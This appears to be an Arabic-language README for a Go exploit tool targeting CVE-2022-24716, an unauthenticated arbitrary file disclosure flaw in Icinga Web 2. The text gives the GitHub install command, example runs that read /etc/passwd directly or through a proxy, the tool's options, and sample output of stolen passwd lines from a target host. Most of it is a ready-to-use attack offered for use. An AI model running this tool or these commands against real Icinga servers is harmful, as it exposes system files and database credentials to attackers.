
CVE-2022-24716 (كشف الملفات التعسفي في Icingaweb2)
Icinga Web 2 هو واجهة ويب مفتوحة المصدر لمراقبة الأنظمة، وإطار عمل، وواجهة سطر أوامر. يمكن للمستخدمين غير المصادقين تسريب محتويات ملفات النظام المحلية القابلة للوصول من خادم الويب، بما في ذلك ملفات تكوين icingaweb2 التي تحتوي على بيانات اعتماد قاعدة البيانات.
CVE-2022-24716 يتطلب golang ولتنزيله فقط استخدم:
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
سيؤدي هذا إلى عرض التعليمات الخاصة بالأداة. فيما يلي جميع الخيارات التي تدعمها:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......